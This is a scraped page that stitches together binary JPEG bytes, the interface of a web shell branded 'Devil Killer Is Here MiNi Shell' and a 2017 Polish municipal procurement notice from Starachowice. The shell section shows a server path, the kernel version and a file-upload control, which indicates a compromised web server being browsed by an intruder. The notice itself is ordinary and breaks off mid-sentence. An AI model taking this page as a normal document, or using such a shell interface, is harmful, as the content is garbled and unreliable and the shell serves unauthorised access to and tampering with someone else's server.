JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20170330/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20170330/55299-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.starachowice.pl/' target='_blank'>http://bip.starachowice.pl/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 55299 - 2017
              z dnia 2017-03-30 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Starachowice:  Wykonanie opracowań przedprojektowych w
ramach zadania Starachowice OD nowa<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Zamówienie jest finansowane ze środków Unii Europejskiej Projekt: Starachowice OD nowa POPT 2014 ­ 2020</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b>nie dotyczy<br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b>nie dotyczy<br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Starachowice, krajowy numer identyfikacyjny
              291009892, ul.
              ul. Radomska 
              45,
              27-200 
              Starachowice, woj.
              świętokrzyskie, państwo
              Polska, tel.
              +48412738275, e-mail
              zamowienia@starachowice.eu, faks
              +48412738275.
              <br />
              Adres strony internetowej (URL): http://starachowice.eu/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br />nie dotyczy</div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.starachowice.pl/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy złożyć w zamkniętej kopercie w Urzędzie Miejskim w Starachowicach ul. Radomska 45, Referat Organizacyjny (parter, pok. nr 1) lub przesłać pocztą na:<br />
                Adres:
                <br />Urząd Miejski Zespół ds. Zamówień Publicznych (pok. 111) ul. Radomska 45 27­ 200 Starachowice</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br />nie dotyczy</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> Wykonanie opracowań przedprojektowych w
ramach zadania Starachowice OD nowa<br /><b>Numer referencyjny: </b>ZP.271.16.2017.HE<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b><br />wszystkich części zamówienia<br /><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b> Przedmiotem
zamówienia jest wykonanie opracowań przedprojektowych: a) część III Opracowanie: inwentaryzacji
budowlanych, ekspertyz technicznych i audytów dla 4 budynków mieszkalnych: nr 2 i nr 10 przy ulicy
Robotniczej, nr 12 i nr 14 przy ulicy Widok (z uwzględnieniem przebudowy pomieszczeń będących komórkami
lokatorskimi) budynek nr 2 przy ul. Robotniczej  pow. użytkowa  255 m2, kubatura  ok. 892 m3, 10 lokali,
budynek nr 10 przy ul. Robotniczej  pow. użytkowa  192 m2, kubatura  ok. 672 m3, 6 lokali, budynek nr 12
przy ul. Widok  pow. użytkowa  342 m2, kubatura  ok. 1197 m3, 14 lokali, budynek nr 14 przy ul. Widok 
pow. użytkowa  189 m2, kubatura  ok. 662 m3, 6 lokali. b) część IV Opracowanie: inwentaryzacji
architektonicznych, oceny stanu technicznego dla 4 budynków gospodarczych przy ulicy Robotniczej i ulicy
Widok oraz koncepcji budowy budynku użyteczności publicznej i 3 budynków mieszkalnych w miejscu
usytuowania istniejących budynków gospodarczych budynek gospodarczy przy budynkach mieszkalnych ul.
Widok nr 8 i nr 10 ­ pow. około 160 m2 , budynek gospodarczy przy budynku mieszkalnym ul. Widok nr 12 ­
pow. około 150 m2 , budynek gospodarczy przy budynku mieszkalnym ul. Robotnicza nr 14 ­ pow. około 120
m2 , budynek gospodarczy przy budynku mieszkalnym ul. Robotnicza nr 4 ­ pow. około 90 m2 Zamówienie jest
finansowane ze środków Unii Europejskiej Projekt: Starachowice OD nowa POPT 2014 ­ 2020. Zamawiający
umożliwi Wykonawcom, w celu przygotowania się do złożenia i prawidłowego sporządzenia ofert,
przeprowadzenie wizji lokalnej dla zapoznania się z terenem, na którym realizowany będzie przedmiot zamówienia.
Zamawiający wymaga, adekwatnie do przedmiotu zamówienia, dostosowania projektu do potrzeb wszystkich
użytkowników, w tym zapewnienia dostępności dla osób niepełnosprawnych. Ze względu na charakter czynności
objętych zamówieniem Zamawiający nie wymaga zatrudniania osób biorących udział w realizacji zamówienia na
podstawie umowy o pracę. Szczegółowy opis przedmiotu zamówienia na poszczególne części zamówienia zawiera
załącznik nr 1 do Specyfikacji istotnych warunków zamówienia (zwana dalej SIWZ). <br /><br /><b>II.5) Główny kod CPV: </b>71320000-7<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/07/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Termin realizacji zamówienia dla każdej części zamówienia  wymagany: część III i część IV - do dnia 30.07.2017 r. </div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                nie dotyczy<br />
                Informacje dodatkowe
                nie dotyczy<br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                nie dotyczy<br />
                Informacje dodatkowe
                nie dotyczy<br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Określenie warunków: Wykonawcy muszą spełnić następujące warunki: 1) posiadanie zdolności technicznej
lub zawodowej: a) Część III ­ wymagane jest wykazanie wykonanych w okresie ostatnich trzech lat przed
upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie należycie
co najmniej: dwóch usług, z których każda obejmowała wykonanie ekspertyzy technicznej dla budowy,
przebudowy lub remontu budynku o kubaturze nie mniejszej niż 500 m3 . W przypadku składania oferty przez
Wykonawców występujących wspólnie wyżej wymieniony warunek mogą spełniać łącznie. Część IV 
wymagane jest wykazanie wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert a
jeżeli okres prowadzenia działalności jest krótszy  w tym okresie należycie co najmniej: dwóch usług, z
których każda obejmowała wykonanie ekspertyzy technicznej dla budowy, przebudowy lub remontu budynku
o kubaturze nie mniejszej niż 500 m3 . W przypadku składania oferty przez Wykonawców występujących
wspólnie wyżej wymieniony warunek mogą spełniać łącznie. b) Część III ­ wymagane jest dysponowanie
osobami o odpowiednich kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnym do
wykonania przedmiotu zamówienia tj. wymagane jest dysponowanie: jedną osobą, która pełnić będzie funkcję
kierownika zespołu projektowego, posiadającą następujące kwalifikacje: doświadczenie w sporządzaniu co
najmniej 1 dokumentacji projektowej obejmującej wykonanie ekspertyzy technicznej dla budowy, przebudowy
lub remontu budynku o kubaturze nie mniejszej niż 500 m3 , stosowne uprawnienia budowlane do
projektowania, które uprawniają do pełnienia samodzielnej funkcji technicznej projektanta w specjalności
konstrukcyjno ­ budowlanej bez ograniczeń lub architektonicznej bez ograniczeń w zakresie niezbędnym do
realizacji przedmiotu zamówienia, które zostały wydane na podstawie aktualnie obowiązujących przepisów lub
odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa. W
przypadku składania oferty przez Wykonawców występujących wspólnie wyżej wymieniony warunek musi
spełnić co najmniej jeden z Wykonawców. Część IV ­ wymagane jest dysponowanie osobami o odpowiednich
kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnym do wykonania przedmiotu
zamówienia tj. wymagane jest dysponowanie: jedną osobą, która pełnić będzie funkcję kierownika zespołu
projektowego, posiadającą następujące kwalifikacje: doświadczenie w sporządzaniu co najmniej 1
dokumentacji projektowej obejmującej wykonanie ekspertyzy technicznej dla budowy, przebudowy lub
remontu budynku o kubaturze nie mniejszej niż 500 m3 , stosowne uprawnienia budowlane do
projektowania, które uprawniają do pełnienia samodzielnej funkcji technicznej projektanta w specjalności
konstrukcyjno ­ budowlanej bez ograniczeń lub architektonicznej bez ograniczeń w zakresie niezbędnym do
realizacji przedmiotu zamówienia, które zostały wydane na podstawie aktualnie obowiązujących przepisów lub
odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa. W
przypadku składania oferty przez Wykonawców występujących wspólnie wyżej wymieniony warunek musi
spełnić co najmniej jeden z Wykonawców. Wskazane powyżej uprawnienia budowlane muszą być zgodne z
ustawą dnia 7 lipca 1994 r. Prawo budowlane oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia
11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadającym im
ważnym uprawnieniom budowlanym, wydanym na podstawie uprzednio obowiązujących przepisów prawa lub
odpowiednich przepisów obowiązujących na terenie kraju, z którego pochodzi dana osoba, które w zakresie
objętym zamówieniem pozwalać będą na pełnienie samodzielnych funkcji technicznych w budownictwie w
ww. specjalności. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w
stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na
zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów,
niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. Wykonawca, który polega na
zdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizując zamówienie,
będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie
tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.
Zamawiający oceni, czy udostępniane Wykonawcy przez inne podmioty zdolności techniczne lub zawodowe
lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków
udziału w postępowaniu oraz bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których
mowa w art. 24 ust. 1 pkt 13  22 i ust. 5 ustawy Pzp. W odniesieniu do warunków dotyczących
wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy mogą polegać na zdolnościach
innych podmiotów, jeśli podmioty te zrealizują roboty budowlane lub usługi, do realizacji których te zdolności
są wymagane, przewidziane w tym zamówieniu. Jeżeli zdolności techniczne lub zawodowe lub sytuacja
ekonomiczna lub finansowa, podmiotu, nie potwierdzają spełnienia przez Wykonawcę warunków udziału w
postępowaniu lub zachodzą wobec tych podmiotów podstawy wykluczenia, Zamawiający żąda, aby
Wykonawca w terminie określonym przez Zamawiającego: 1) zastąpił ten podmiot innym podmiotem lub
podmiotami lub, 2) zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże
zdolności techniczne lub zawodowe lub sytuację finansową lub ekonomiczną. Zamawiający może, na każdym
etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie
zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może
mieć negatywny wpływ na realizację zamówienia. Niespełnienie chociażby jednego z powyższych warunków,


skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 1 pkt 12) ustawy Pzp.
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają
pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w
postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Przepisy dotyczące Wykonawcy stosuje
się odpowiednio do Wykonawców, o których mowa wyżej. Podstawy dotyczące wykluczenia wskazane w
niniejszej SIWZ każdy z Wykonawców musi wykazać odrębnie w składanej ofercie (dotyczy oświadczeń i
deklaracji), czy w trakcie procedury badania i oceny ofert. W przypadku warunków udziału w postępowaniu
zostały opisane w części SIWZ odnoszącej się do wymaganych warunków udziału. Jeżeli oferta Wykonawców
wspólnie ubiegających się o udzielenie zamówienia, została wybrana, Zamawiający żąda przed zawarciem
umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców. W przypadku
wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa każdy z Wykonawców
wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w
postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie
warunków udziału w postępowaniu lub kryteriów selekcji oraz brak podstaw wykluczenia. Wykonawcy
składający ofertę wspólną mają obowiązek w formularzu OFERTA dokładnie wskazać dane (nazwa firmy,
adres) wszystkich Wykonawców.


<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                nie dotyczy</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W celu wykazania braku podstaw do wykluczenia z postępowania w okolicznościach, o których mowa w art.
24. ust. 1 pkt 23) ustawy Pzp Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej
informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekazuje Zamawiającemu oświadczenie o
przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w ust. 1 pkt 23)
ustawy Pzp  załącznik nr 4 do SIWZ. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić
dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o
udzielenie zamówienia. W przypadku składania oferty przez Wykonawców występujących wspólnie wyżej
wymieniony dokument musi być złożony przez każdego Wykonawcę. Zamawiający wezwie Wykonawcę,
którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie aktualnych na dzień złożenia
nw. oświadczeń i dokumentów: a) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o
działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu
potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp, wystawionego nie
wcześniej niż 6 miesięcy przed upływem terminu składania ofert b) zaświadczenia właściwego naczelnika
urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie
wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że
Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z
ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie,
odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego
organu c) zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub
Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie
zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3
miesiące przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że Wykonawca
zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami
lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty
zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu W przypadku składania
oferty przez Wykonawców występujących wspólnie wyżej wymienione dokumenty muszą być złożone przez
każdego Wykonawcę. d) Jeżeli Wykonawca polega na zdolnościach technicznych lub zawodowych lub
sytuacji finansowej lub ekonomicznej innych podmiotów Zamawiający w celu zbadania czy wobec tych
podmiotów nie zachodzą przesłanki wykluczenia żąda od tych podmiotów złożenia dokumentów, o których

mowa w pkt 7.3) lit. a) ­ c) SIWZ. e) Jeżeli, Wykonawca ma siedzibę lub miejsce zamieszkania poza
terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 7.3) SIWZ lit. a)­c) 
składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania,
potwierdzające odpowiednio, że: nie otwarto jego likwidacji ani nie ogłoszono upadłości (wystawione nie
wcześniej niż 6 miesięcy przed upływem terminu składania ofert) nie zalega z opłacaniem podatków, opłat,
składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w
sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał
przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w
całości wykonania decyzji właściwego organu, (wystawione nie wcześniej niż 3 miesiące przed upływem
terminu składania ofert). f) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub
